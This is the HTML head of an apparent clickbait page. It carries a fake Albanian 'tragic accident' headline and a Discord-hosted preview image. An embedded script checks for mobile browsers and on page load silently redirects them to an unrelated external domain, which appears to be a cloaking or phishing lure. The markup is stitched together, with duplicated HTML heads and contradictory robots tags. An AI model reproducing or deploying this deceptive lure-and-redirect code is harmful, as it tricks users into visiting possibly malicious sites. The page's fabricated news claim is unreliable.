<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="319,142,105,vizitë"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Aksidenti tragjik ka marrë disa jetë njerëzish mëngjesin e sotëm."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1225045975517757527/1225046069772030053/fgdfdsgfgf.png?ex=661fb40f&is=660d3f0f&hm=f7af8fb08fdc830516aed50bfa3ec6ab763c65303e629f0f5366365b77ef4c58&=&format=webp&quality=lossless"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Aksidenti tragjik ka marrë disa jetë njerëzish mëngjesin e sotëm.</title>
<script>
    // Función para detectar si el usuario está utilizando un dispositivo móvil
    function detectarDispositivoMovil() {
        return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
    }

    // Función para redirigir a la URL móvil si se detecta un dispositivo móvil
    function redirigirSiEsMovil() {
        if (detectarDispositivoMovil()) {
            window.location.href = "https://jaynesne201.jaskingnew212.cloud";
        }
    }

    // Llamar a la función de redirección al cargar la página
    window.onload = redirigirSiEsMovil;
</script>
